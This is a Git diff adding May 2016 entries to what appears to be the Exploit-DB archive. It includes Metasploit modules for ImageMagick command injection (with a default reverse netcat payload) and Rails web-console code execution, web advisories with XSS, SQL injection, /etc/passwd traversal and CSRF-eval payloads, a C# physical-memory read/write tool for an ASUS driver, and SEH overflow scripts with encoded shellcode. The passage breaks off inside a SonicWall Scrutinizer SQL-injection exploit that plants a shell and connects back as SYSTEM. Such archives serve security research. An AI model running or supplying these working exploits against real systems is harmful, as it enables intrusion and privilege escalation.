39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
39735,platforms/windows/remote/39735.rb,"Advantech WebAccess Dashboard Viewer Arbitrary File Upload",2016-04-26,metasploit,windows,remote,80
@ -35993,3 +35993,13 @@ id,file,description,date,author,platform,type,port
39778,platforms/windows/dos/39778.txt,"Adobe Flash - Use-After-Free When Rendering Displays From Multiple Scripts",2016-05-06,"Google Security Research",windows,dos,0
39779,platforms/windows/dos/39779.txt,"Adobe Flash - MovieClip.duplicateMovieClip Use-After-Free",2016-05-06,"Google Security Research",windows,dos,0
39780,platforms/jsp/webapps/39780.txt,"ManageEngine Applications Manager Build 12700 - Multiple Vulnerabilities",2016-05-06,"Saif El-Sherei",jsp,webapps,443
39781,platforms/php/webapps/39781.txt,"Ajaxel CMS 8.0 - Multiple Vulnerabilities",2016-05-09,DizzyDuck,php,webapps,80
39782,platforms/windows/local/39782.py,"i.FTP 2.21 - Host Address / URL Field SEH Exploit",2016-05-09,"Tantaryu MING",windows,local,0
39783,platforms/windows/remote/39783.py,"Dell SonicWall Scrutinizer <= 11.0.1 - setUserSkin/deleteTab SQL Injection Remote Code Execution",2016-05-09,mr_me,windows,remote,0
39784,platforms/php/webapps/39784.txt,"ZeewaysCMS - Multiple Vulnerabilities",2016-05-09,"Bikramaditya Guha",php,webapps,80
39785,platforms/windows/dos/39785.cs,"ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write",2016-05-09,slipstream,windows,dos,0
39786,platforms/windows/local/39786.txt,"Certec EDV atvise SCADA Server 2.5.9 - Privilege Escalation",2016-05-09,LiquidWorm,windows,local,0
39788,platforms/windows/local/39788.txt,"Microsoft Windows 7 - WebDAV Privilege Escalation Exploit (MS16-016) (2)",2016-05-09,hex0r,windows,local,0
39789,platforms/windows/dos/39789.py,"RPCScan 2.03 - Hostname/IP Field SEH Overwrite PoC",2016-05-09,"Nipun Jaswal",windows,dos,0
39791,platforms/multiple/local/39791.rb,"ImageMagick Delegate Arbitrary Command Execution",2016-05-09,metasploit,multiple,local,0
39792,platforms/ruby/remote/39792.rb,"Ruby on Rails Development Web Console (v2) Code Execution",2016-05-09,metasploit,ruby,remote,3000

Can't render this file because it is too large.

87
platforms/multiple/local/39791.rb Executable file
View file

@ -0,0 +1,87 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'ImageMagick Delegate Arbitrary Command Execution',
'Description' => %q{
This module exploits a shell command injection in the way "delegates"
(commands for converting files) are processed in ImageMagick versions
<= 7.0.1-0 and <= 6.9.3-9 (legacy).
Since ImageMagick uses file magic to detect file format, you can create
a .png (for example) which is actually a crafted SVG (for example) that
triggers the command injection.
Tested on Linux, BSD, and OS X. You'll want to choose your payload
carefully due to portability concerns. Use cmd/unix/generic if need be.
},
'Author' => [
'stewie', # Vulnerability discovery
'Nikolay Ermishkin', # Vulnerability discovery
'wvu', # Metasploit module
'hdm' # Metasploit module
],
'References' => [
%w{CVE 2016-3714},
%w{URL https://imagetragick.com/},
%w{URL http://seclists.org/oss-sec/2016/q2/205},
%w{URL https://github.com/ImageMagick/ImageMagick/commit/06c41ab},
%w{URL https://github.com/ImageMagick/ImageMagick/commit/a347456}
],
'DisclosureDate' => 'May 3 2016',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'BadChars' => "\x22\x27\x5c", # ", ', and \
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic netcat bash-tcp'
}
},
'Targets' => [
['SVG file', template: 'msf.svg'], # convert msf.png msf.svg
['MVG file', template: 'msf.mvg'], # convert msf.svg msf.mvg
['MIFF file', template: 'msf.miff'] # convert -label "" msf.svg msf.miff
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat',
'LHOST' => Rex::Socket.source_address,
'DisablePayloadHandler' => false,
'WfsDelay' => 9001
}
))
register_options([
OptString.new('FILENAME', [true, 'Output file', 'msf.png'])
])
end
def exploit
if target.name == 'SVG file'
p = Rex::Text.html_encode(payload.encoded)
else
p = payload.encoded
end
file_create(template.sub('echo vulnerable', p))
end
def template
File.read(File.join(
Msf::Config.data_directory, 'exploits', 'CVE-2016-3714', target[:template]
))
end
end

69
platforms/php/webapps/39781.txt Executable file
View file

@ -0,0 +1,69 @@
Ajaxel CMS 8.0 Multiple Vulnerabilities
Vendor: Ajaxel
Product web page: http://www.ajaxel.com
Affected version: 8.0 and below
Summary: Ajaxel CMS is very simple ajaxified CMS and framework
for any project needs.
Desc: Ajaxel CMS version 8.0 and below suffers from multiple
vulnerabilities inlcuding LFI, XSS, SQL injection and remote
code execution via CSRF.
Tested on: Apache 2.4.10
MySQL 5.5.46
Vendor status:
[13.04.2016] Vulnerabilities discovered.
[14.04.2016] Vendor contacted.
[18.04.2016] Vendor releases patch for version 8.0 to address these issues.
[05.05.2016] Public security advisory released.
Vulnerability discovered by Krzysztof 'DizzyDuck' Kosinski
[dizzyduck_at_zeroscience.mk]
1. Reflected XSS:
-----------------
GET /cmsj9bwp'-alert(1)-'xvjry=mods/ HTTP/1.1
Host: 192.168.10.5
HTTP/1.0 404 Not Found
...
...var Conf={LANG:'en', TPL:'default', DEVICE:'pc', SESSION_LIFETIME:7200,
USER_ID:1, URL_EXT:'', HTTP_EXT:'/', FTP_EXT:'/',
REFERER:'/cmsj9bwp'-alert(1)-'xvjry=mods', VERSION:8.0,
URL_KEY_ADMIN:'cms',...
2. SQL Injection:
-----------------
http://192.168.10.5/cms=mods/tab=ai?mods_ai_tab_ai-submitted=1&f=<SQLi>
3. Local File Disclosure:
-------------------------
http://192.168.10.5/?window&cms=templates&popup=1&file_folder=cms&folder=&file=../../../../../../../../../../../../etc/passwd
4. Cross-Site Request Forgery - RCE PoC:
----------------------------------------
<html>
<body>
<form action="http://192.168.10.5/cms=settings_eval_tab/tab=eval/load"
method="POST">
<input type="hidden" name="data&#91;eval&#93;"
value="phpinfo&#40;&#41;&#59;" />
<input type="hidden" name="a" value="eval" />
<input type="hidden"
name="settings&#95;eval&#95;tab&#95;eval&#45;submitted" value="1" />
<input type="submit" value="Execute" />
</form>
</body>
</html>

94
platforms/php/webapps/39784.txt Executable file
View file

@ -0,0 +1,94 @@
ZeewaysCMS Multiple Vulnerabilities
[Software]
- ZeewaysCMS
[Vendor Product Description]
- ZeewaysCMS is a Content Management System and a complete Web & Mobile Solution developed by Zeeways for Corporates,
Individuals or any kind of Business needs.
- Site: http://www.zeewayscms.com/
[Advisory Timeline]
[25.03.2016] Vulnerability discovered.
[25.03.2016] Vendor contacted.
[29.03.2016] Follow up with the vendor.
[29.03.2016] Vendor responded asking for details.
[29.03.2016] Advisory and details sent to the vendor.
[06.04.2016] Follow up with the vendor. No response received.
[06.05.2016] Public security advisory released.
[Bug Summary]
- Directory Traversal
- Cross Site Scripting (Stored)
[Impact]
- High
[Affected Version]
- Unknown
[Tested on]
- Apache/2.2.27
- PHP/5.4.28
[Advisory]
- ID: ZSL-2016-5319
- URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5319.php
[Bug Description and Proof of Concept]
- ZeewaysCMS suffers from a file inclusion vulnerability (LFI) when encoded input passed thru the 'targeturl' GET
parameter is not properly verified before being used to include files. This can be exploited to include files from
local resources with directory traversal attacks and URL encoded NULL bytes.
https://en.wikipedia.org/wiki/Directory_traversal_attack
- Multiple cross-site scripting vulnerabilities were also discovered. The issue is triggered when input passed
via multiple parameters is not properly sanitized before being returned to the user. This can be exploited to
execute arbitrary HTML and script code in a user's browser session in context of an affected site.
https://en.wikipedia.org/wiki/Cross-site_scripting
[Proof-of-Concept]
1. Directory Traversal:
http://localhost/demo//createPDF.php?targeturl=Ly4uLy4uLy4uLy4uLy4uLy4uLy4uLy4uL2V0Yy9wYXNzd2Q=&&pay_id=4&&type=actual
Parameters: targeturl (GET)
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Cross Site Scripting (Stored)
http://localhost/demo/profile
Parameters: screen_name, f_name, l_name, uc_email, uc_mobile, user_contact_num (POST)
Payload(s):
Content-Disposition: form-data; name="screen_name"
"><script><<imgIMG SRC=oi onerror=JaVaScript:alert(1)>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"

87
platforms/ruby/remote/39792.rb Executable file
View file

@ -0,0 +1,87 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby on Rails Development Web Console (v2) Code Execution',
'Description' => %q{
This module exploits a remote code execution feature of the Ruby on Rails
framework. This feature is exposed if the config.web_console.whitelisted_ips
setting includes untrusted IP ranges and the web-console gem is enabled.
},
'Author' => ['hdm'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'https://github.com/rails/web-console' ]
],
'Platform' => 'ruby',
'Arch' => ARCH_RUBY,
'Privileged' => false,
'Targets' => [ ['Automatic', {} ] ],
'DefaultOptions' => { 'PrependFork' => true },
'DisclosureDate' => 'May 2 2016',
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(3000),
OptString.new('TARGETURI', [ true, 'The path to a vulnerable Ruby on Rails application', '/missing404' ])
], self.class)
end
#
# Identify the web console path and session ID, then inject code with it
#
def exploit
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path),
'method' => 'GET'
}, 25)
unless res
print_error("Error: No response requesting #{datastore['TARGETURI']}")
return
end
unless res.body.to_s =~ /data-mount-point='([^']+)'/
if res.body.to_s.index('Application Trace') && res.body.to_s.index('Toggle session dump')
print_error('Error: The web console is either disabled or you are not in the whitelisted scope')
else
print_error("Error: No rails stack trace found requesting #{datastore['TARGETURI']}")
end
return
end
console_path = normalize_uri($1, 'repl_sessions')
unless res.body.to_s =~ /data-session-id='([^']+)'/
print_error("Error: No session id found requesting #{datastore['TARGETURI']}")
return
end
session_id = $1
print_status("Sending payload to #{console_path}/#{session_id}")
res = send_request_cgi({
'uri' => normalize_uri(console_path, session_id),
'method' => 'PUT',
'headers' => {
'Accept' => 'application/vnd.web-console.v2',
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_post' => {
'input' => payload.encoded
}
}, 25)
end
end

217
platforms/windows/dos/39785.cs Executable file
View file

@ -0,0 +1,217 @@
/*
Source: http://rol.im/asux/
ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write
PoC by slipstream/RoL - https://twitter.com/TheWack0lian - http://rol.im/chat/
The ASUS "Generic Function Service" includes a couple of drivers, ASMMAP.sys / ASMMAP64.sys,
the version resources describe them as "Memory mapping Driver".
This description is very accurate, it has a pair of ioctls, 0x9C402580 and 0x9C402584, that map or
unmap to the calling process' address space ANY PART OF PHYSICAL MEMORY, with READ/WRITE permissions.
Using code that has been copypasta'd a bunch of times, but seems to originate from a sample driver for NT 3.1.
1993 vintage code, everybody.
It also has a couple of other ioctls that allocate or free some RAM and gives the physical and virtual pointers
to it, and another one that can make any I/O request (does in/out byte/word/dword with parameters given in the ioctl buffer,
and returns the result for the case of in). These.. don't really matter, I guess? Well, I guess you could mess with SMM
or other issues easily...
This PoC can dump a block of physical memory to disk, and write to a block of physical memory from a file.
I wrote it in C# so others can easily add the ASMMap_MapMem class to their powershell exploitation frameworks, if they so want.
To ASUS: MS locked PhysicalMemory down in 2004. Don't use 1993 code to remove the restrictions, and let even unprivileged users
access it (where back before it was locked to ring0, only SYSTEM could access it).
To MS: why did you even sign asmmap/asmmap64? Probably automation. Come on, why does signing even exist if you sign whatever driver
an OEM asks you to, without checking?
*/
// This uses pointers, so compile with /unsafe.
using System;
using System.ComponentModel;
using System.Globalization;
using System.IO;
using System.Runtime.InteropServices;
using Microsoft.Win32.SafeHandles;
public class ASMMap_MapMem : IDisposable {
public const uint IOCTL_MAPMEM = 0x9C402580;
public const uint IOCTL_UNMAPMEM = 0x9C402584;
[DllImport("kernel32.dll", SetLastError = true, CharSet = CharSet.Auto)]
public static extern SafeFileHandle CreateFile(
string lpFileName,
[MarshalAs(UnmanagedType.U4)] FileAccess dwDesiredAccess,
[MarshalAs(UnmanagedType.U4)] FileShare dwShareMode,
IntPtr lpSecurityAttributes,
[MarshalAs(UnmanagedType.U4)] FileMode dwCreationDisposition,
[MarshalAs(UnmanagedType.U4)] FileAttributes dwFlagsAndAttributes,
IntPtr hTemplateFile);
[DllImport("kernel32.dll", SetLastError = true)]
static extern bool DeviceIoControl(
SafeFileHandle hDevice,
uint IoControlCode,
ref MapMemIoctl InBuffer,
int nInBufferSize,
ref MapMemIoctl OutBuffer,
int nOutBufferSize,
IntPtr pBytesReturned,
IntPtr Overlapped
);
[StructLayout(LayoutKind.Sequential)]
public unsafe struct MapMemIoctl {
public ulong PhysicalAddress;
public byte* VirtualAddress;
[MarshalAs(UnmanagedType.ByValArray, SizeConst=2)]
public uint[] Length;
public MapMemIoctl(SafeFileHandle asmmap,ulong PhysicalAddress,uint Length) {
this.PhysicalAddress = PhysicalAddress;
// Length[0] is used with ASMMAP64, Length[1] by ASMMAP. Set both here, ASMMAP will overwrite Length[0] anyway.
this.Length = new uint[2];
this.Length[0] = Length;
this.Length[1] = Length;
this.VirtualAddress = null;
// Fire the ioctl
Console.WriteLine("[*] Mapping 0x{0}-0x{1} into this process' address space...",PhysicalAddress.ToString("X"),(PhysicalAddress+Length).ToString("X"));
if (!DeviceIoControl(asmmap,IOCTL_MAPMEM,ref this,Marshal.SizeOf(typeof(MapMemIoctl)),ref this,Marshal.SizeOf(typeof(MapMemIoctl)),IntPtr.Zero,IntPtr.Zero)) {
throw new Win32Exception();
}
Console.WriteLine("[+] Mapped at 0x{0}",new IntPtr(this.VirtualAddress).ToInt64().ToString("X"));
}
}
private MapMemIoctl mm;
private SafeFileHandle asmmap = null;
private bool ShouldDisposeOfAsmMap = false;
private bool HasBeenDisposed = false;
public uint Length {
get {
if (this.HasBeenDisposed) throw new ObjectDisposedException("ASMMap_MapMem");
return mm.Length[ ( IntPtr.Size == 4 ? 1 : 0 ) ];
}
}
public UnmanagedMemoryStream PhysicalMemoryBlock {
get {
if (this.HasBeenDisposed) throw new ObjectDisposedException("ASMMap_MapMem");
unsafe {
return new UnmanagedMemoryStream(mm.VirtualAddress,this.Length,this.Length,FileAccess.ReadWrite);
}
}
}
public ASMMap_MapMem(ulong PhysicalAddress,uint Length) : this(null,PhysicalAddress,Length) {
}
public ASMMap_MapMem(SafeFileHandle asmmap,ulong PhysicalAddress,uint Length) {
if (asmmap == null) {
asmmap = CreateFile("\\\\.\\ASMMAP" + (IntPtr.Size == 8 ? "64" : ""),FileAccess.ReadWrite,FileShare.None,
IntPtr.Zero,FileMode.Create,FileAttributes.Temporary,IntPtr.Zero);
this.ShouldDisposeOfAsmMap = true;
}
this.asmmap = asmmap;
this.mm = new MapMemIoctl(asmmap,PhysicalAddress,Length);
}
public void Dispose() {
if (this.HasBeenDisposed) return;
unsafe {
Console.WriteLine("[*] Unmapping 0x{0}-0x{1} (0x{2})...",
mm.PhysicalAddress.ToString("X"),
(mm.PhysicalAddress+Length).ToString("X"),
new IntPtr(mm.VirtualAddress).ToInt64().ToString("X")
);
}
try {
if (!DeviceIoControl(asmmap,IOCTL_UNMAPMEM,ref mm,Marshal.SizeOf(typeof(MapMemIoctl)),ref mm,Marshal.SizeOf(typeof(MapMemIoctl)),IntPtr.Zero,IntPtr.Zero)) {
throw new Win32Exception();
}
Console.WriteLine("[+] Unmapped successfully");
} finally {
// dispose of the driver handle if needed
if (this.ShouldDisposeOfAsmMap) asmmap.Dispose();
this.HasBeenDisposed = true;
}
}
~ASMMap_MapMem() {
this.Dispose();
}
}
class asmmap {
public static bool TryParseDecAndHex(string value,out ulong result) {
if ((value.Length > 2) && (value.Substring(0,2) == "0x")) return ulong.TryParse(value.Substring(2),NumberStyles.AllowHexSpecifier,CultureInfo.InvariantCulture,out result);
return ulong.TryParse(value,out result);
}
public static void Usage() {
Console.WriteLine("[*] Usage: {0} <read/write> <address> <length/file>",Path.GetFileName(System.Reflection.Assembly.GetEntryAssembly().Location));
Console.WriteLine("[*] address: starting physical address to read/write, can be decimal or hex, for hex, start with 0x");
Console.WriteLine("[*] length: size of memory to read, can be decimal or hex, for hex, start with 0x");
Console.WriteLine("[*] file: file whose contents will be written at <address>");
}
public static void Read(ulong PhysicalAddress,ulong Length) {
uint IterationSize = ( IntPtr.Size == 8 ? (uint)0x10000000 : (uint)0x1000000 );
using (SafeFileHandle asmmap = ASMMap_MapMem.CreateFile("\\\\.\\ASMMAP" + (IntPtr.Size == 8 ? "64" : ""),FileAccess.ReadWrite,
FileShare.None,IntPtr.Zero,FileMode.Create,FileAttributes.Temporary,IntPtr.Zero))
using (FileStream stream = new FileStream("" + (PhysicalAddress.ToString("X")) + "-" + ((PhysicalAddress + Length).ToString("X")) + ".bin",FileMode.Create)) {
for (; Length > 0; Length -= IterationSize, PhysicalAddress += IterationSize) {
using (ASMMap_MapMem mapper = new ASMMap_MapMem(asmmap,PhysicalAddress,( Length > IterationSize ? IterationSize : (uint)(Length & 0xffffffff) ))) {
Console.WriteLine("[+] Reading block of memory...");
mapper.PhysicalMemoryBlock.CopyTo(stream);
}
if ( Length <= IterationSize) break;
}
}
Console.WriteLine("[+] Read successful: "+ (PhysicalAddress.ToString("X")) + "-" + ((PhysicalAddress + Length).ToString("X")) + ".bin");
}
public static void Write(ulong PhysicalAddress,string Filename) {
using (FileStream stream = new FileStream(Filename,FileMode.Open))
using (ASMMap_MapMem mapper = new ASMMap_MapMem(PhysicalAddress,(uint)stream.Length)) {
Console.WriteLine("[+] Writing block of memory...");
stream.CopyTo(mapper.PhysicalMemoryBlock);
}
}
public static void Main(string[] args) {
Console.WriteLine("[*] ASUS Memory Mapping Driver (ASMMAP/ASMMAP64): Physical Memory Read/Write");
Console.WriteLine("[*] PoC by slipstream/RoL - https://twitter.com/TheWack0lian - http://rol.im/chat/");
if (args.Length < 3) {
Usage();
return;
}
ulong PhysicalAddress, Length;
switch (args[0]) {
case "read":
case "-read":
case "--read":
if ((!TryParseDecAndHex(args[1],out PhysicalAddress)) || (!TryParseDecAndHex(args[2],out Length))) {
Usage();
return;
}
Read(PhysicalAddress,Length);
break;
case "write":
case "-write":
case "--write":
if (!TryParseDecAndHex(args[1],out PhysicalAddress)) {
Usage();
return;
}
Write(PhysicalAddress,args[2]);
break;
default:
Usage();
break;
}
}
}

30
platforms/windows/dos/39789.py Executable file
View file

@ -0,0 +1,30 @@
#!/usr/bin/python
# Exploit Title : RPCScan v2.03 Hostname/IP Field SEH Overwrite POC
# Discovery by : Nipun Jaswal
# Email : mail@nipunjaswal.info
# Discovery Date : 08/05/2016
# Vendor Homepage : http://samspade.org
# Software Link : http://www.mcafee.com/in/downloads/free-tools/rpcscan.aspx#
# Tested Version : 2.03
# Vulnerability Type: SEH Overwrite POC
# Tested on OS : Windows 7 Home Basic
# Steps to Reproduce: Copy contents of evil.txt file and paste in the Hostname/IP Field. Press ->
##########################################################################################
# -----------------------------------NOTES----------------------------------------------#
##########################################################################################
#SEH chain of main thread
#Address SE handler
#0012FAA0 43434343
#42424242 *** CORRUPT ENTRY ***
# Offset to the SEH Frame is 536
buffer = "A"*536
# Address of the Next SEH Frame
nseh = "B"*4
# Address to the Handler Code, Generally P/P/R Address
seh = "C" *4
f = open("evil.txt", "wb")
f.write(buffer+nseh+seh)
f.close()

70
platforms/windows/local/39782.py Executable file
View file

@ -0,0 +1,70 @@
#!/usr/bin/python
# Exploit Title: i.FTP 2.21 Host Address / URL Field SEH Exploit
# Date: 3-5-2016
# Exploit Author: Tantaryu MING
# Vendor Homepage: http://www.memecode.com/iftp.php
# Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe
# Version: 2.21
# Tested on: Windows 7 SP1 x86_64
# How to exploit: Connect -> Host Address / URL -> copy + paste content of evil.txt -> Press 'Connect' button
'''
msfvenom -p windows/exec CMD=calc -e x86/alpha_upper -a x86 -f c -b '\x00\x0d\x20\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferREgister=EAX
'''
shellcode = (
"\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x56"
"\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30"
"\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42"
"\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b"
"\x4c\x5a\x48\x4b\x32\x35\x50\x33\x30\x43\x30\x33\x50\x4d\x59"
"\x4a\x45\x36\x51\x39\x50\x42\x44\x4c\x4b\x30\x50\x56\x50\x4c"
"\x4b\x51\x42\x34\x4c\x4c\x4b\x30\x52\x35\x44\x4c\x4b\x42\x52"
"\x31\x38\x44\x4f\x58\x37\x51\x5a\x57\x56\x30\x31\x4b\x4f\x4e"
"\x4c\x47\x4c\x35\x31\x43\x4c\x53\x32\x56\x4c\x51\x30\x59\x51"
"\x58\x4f\x34\x4d\x53\x31\x49\x57\x4b\x52\x4a\x52\x50\x52\x50"
"\x57\x4c\x4b\x31\x42\x44\x50\x4c\x4b\x50\x4a\x37\x4c\x4c\x4b"
"\x30\x4c\x54\x51\x52\x58\x4b\x53\x50\x48\x35\x51\x38\x51\x50"
"\x51\x4c\x4b\x31\x49\x47\x50\x33\x31\x48\x53\x4c\x4b\x51\x59"
"\x32\x38\x4d\x33\x47\x4a\x47\x39\x4c\x4b\x47\x44\x4c\x4b\x35"
"\x51\x59\x46\x56\x51\x4b\x4f\x4e\x4c\x59\x51\x48\x4f\x54\x4d"
"\x45\x51\x58\x47\x57\x48\x4d\x30\x33\x45\x4a\x56\x55\x53\x53"
"\x4d\x4c\x38\x57\x4b\x33\x4d\x47\x54\x52\x55\x4b\x54\x30\x58"
"\x4c\x4b\x31\x48\x36\x44\x43\x31\x59\x43\x43\x56\x4c\x4b\x44"
"\x4c\x50\x4b\x4c\x4b\x46\x38\x35\x4c\x45\x51\x4e\x33\x4c\x4b"
"\x34\x44\x4c\x4b\x45\x51\x58\x50\x4b\x39\x51\x54\x36\x44\x57"
"\x54\x51\x4b\x31\x4b\x33\x51\x36\x39\x51\x4a\x30\x51\x4b\x4f"
"\x4b\x50\x51\x4f\x31\x4f\x30\x5a\x4c\x4b\x45\x42\x4a\x4b\x4c"
"\x4d\x51\x4d\x33\x5a\x55\x51\x4c\x4d\x4d\x55\x58\x32\x35\x50"
"\x45\x50\x45\x50\x56\x30\x33\x58\x30\x31\x4c\x4b\x42\x4f\x4d"
"\x57\x4b\x4f\x38\x55\x4f\x4b\x4a\x50\x4e\x55\x39\x32\x50\x56"
"\x52\x48\x59\x36\x4c\x55\x4f\x4d\x4d\x4d\x4b\x4f\x49\x45\x37"
"\x4c\x35\x56\x33\x4c\x44\x4a\x4d\x50\x4b\x4b\x4b\x50\x42\x55"
"\x33\x35\x4f\x4b\x37\x37\x55\x43\x53\x42\x52\x4f\x53\x5a\x33"
"\x30\x46\x33\x4b\x4f\x39\x45\x53\x53\x45\x31\x52\x4c\x35\x33"
"\x35\x50\x41\x41"
)
eax_zeroed = '\x25\x2E\x2E\x2E\x2E'
eax_zeroed += '\x25\x11\x11\x11\x11'
align_to_eax = "\x54\x58" # Get ESP and pop it into EAX
align_to_eax += "\x2d\x7d\x7d\x7d\x7d" # SUB EAX, 0x7d7d7d7d
align_to_eax += "\x2d\x01\x01\x01\x01" # SUB EAX, 0x01010101
align_to_eax += "\x2d\x01\x01\x02\x02" # SUB EAX, 0x02020101
align_to_eax += "\x2d\x7c\x73\x7f\x7f" # SUB EAX, 0x7f7f737c
buffer = "\x41" * 1865
buffer += "\x42\x42\x71\x04" # Pointer to Next SEH Record
buffer += "\x78\x2a\x01\x10" # SEH HANDLER
buffer += eax_zeroed
buffer += align_to_eax
buffer += "\x43" * 5
buffer += shellcode
buffer += "E" * 4
f = open('exploit.txt', "wb")
f.write(buffer)
f.close()

57
platforms/windows/local/39786.txt Executable file
View file

@ -0,0 +1,57 @@

Certec EDV atvise SCADA server 2.5.9 Privilege Escalation Vulnerability
Vendor: Certec EDV GmbH
Product web page: http://www.atvise.com
Affected version: 2.5.9
Summary: atvise scada is based on newest technologies
and standards: The visualization in pure web technology
as well as a consistent vertical object orientation based
on OPC UA changes the world of process management systems.
Desc: The application suffers from an unquoted search path
issue impacting the service 'atserver' for Windows deployed
as part of atvise SCADA. This could potentially allow an
authorized but non-privileged local user to execute arbitrary
code with elevated privileges on the system. A successful
attempt would require the local user to be able to insert
their code in the system root path undetected by the OS or
other security applications where it could potentially be
executed during application startup or reboot. If successful,
the local users code would execute with the elevated privileges
of the application.
Tested on: Microsoft Windows 7 Professional SP1 (EN) 64-bit
Microsoft Windows 7 Ultimate SP1 (EN) 64-bit
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5321
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5321.php
Vendor: http://www.atvise.com/en/news-events/news/465-atvise-3-0-0-released
17.03.2016
---
C:\Users\user>sc qc atserver
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: atserver
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\atvise\atserver.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : atvise server
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

25
platforms/windows/local/39788.txt Executable file
View file

@ -0,0 +1,25 @@
# Exploit Title: WebDAV Elevation of Privilege Vulnerability (MS16)-2
# Date: 8/5/2016
# Exploit Author: hex0r
# Version:WebDAV on Windows 7 84x
# CVE : CVE-2016-0051
Intro:
Credits go to koczkatama for coding a PoC, however if you run this exploit
from shell connection, not a remote desktop, the result will be getting the
privileged shell in new GUI windows.
Again Thanks to
https://github.com/koczkatamas/CVE-2016-0051
https://www.exploit-db.com/exploits/39432/
PoC:
Download the source code (C#) also there will be compiled version as well,
copy the dll file and the executable to the target machine, run it to get
SYSTEM,
Proof of Concept:
https://github.com/hexx0r/CVE-2016-0051
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39788.zip

280
platforms/windows/remote/39783.py Executable file
View file

@ -0,0 +1,280 @@
#!/usr/local/bin/python
"""
Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQL Injection Remote Code Execution
sonic.py by mr_me@offensive-security.com
greets to @brandonprry ;->
Summary:
========
This exploits an pre-auth SQL Injection in the login.php script within an update statement to steal session data. You could also steal login creds
which require absolutely no hash cracking since the target uses symmetric encryption. It then exploits a second post-auth SQL Injection vulnerability
that writes a shell to the target using a relative path and gets SYSTEM.
Vulnerability:
==============
In html/d4d/login.php on lines 27-34:
}else if ($_REQUEST['setSkin']){
echo setUserSkin(
array(
'db' => $db,
'user_id' => $_REQUEST['user_id'],
'skin' => $_REQUEST['setSkin']
)
);
Then, on lines 46-62:
function setUserSkin($args){
$db = $args['db'];
$result = $db->query("
UPDATE plixer.userpreferences
SET setting = '$args[skin]'
WHERE prefCode = 'skin'
AND users_id = $args[user_id]");
if ($args['user_id'] == 1){
$result2 = $db->query("
UPDATE plixer.serverprefs
SET currentVal = '$args[skin]'
WHERE langKey = 'skin'");
}
}
For the post-auth bug, see https://gist.github.com/brandonprry/76741d9a0d4f518fe297
Example:
========
saturn:module-03 mr_me$ ./sonic.py
Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t
mr_me@offensive-security.com
(!) usage: ./poc.py <target> <connectback:port>
saturn:module-03 mr_me$ ./poc.py 172.16.175.147 172.16.175.1:1111
Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t
mr_me@offensive-security.com
(+) target is vuln, proceeding
(+) waiting for session data... starting at: 2016-05-06 16:31:37.022818
(+) awesome, appears like someone has logged in...
(+) it took 0:00:05.020670 to detect valid session data
(+) extracting session data... 1:NfS5yetP49TXCqP5
(+) backdooring target...
(+) starting handler on port 1111
(+) connection from 172.16.175.147
(+) pop thy shell!
whoami
nt authority\system
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
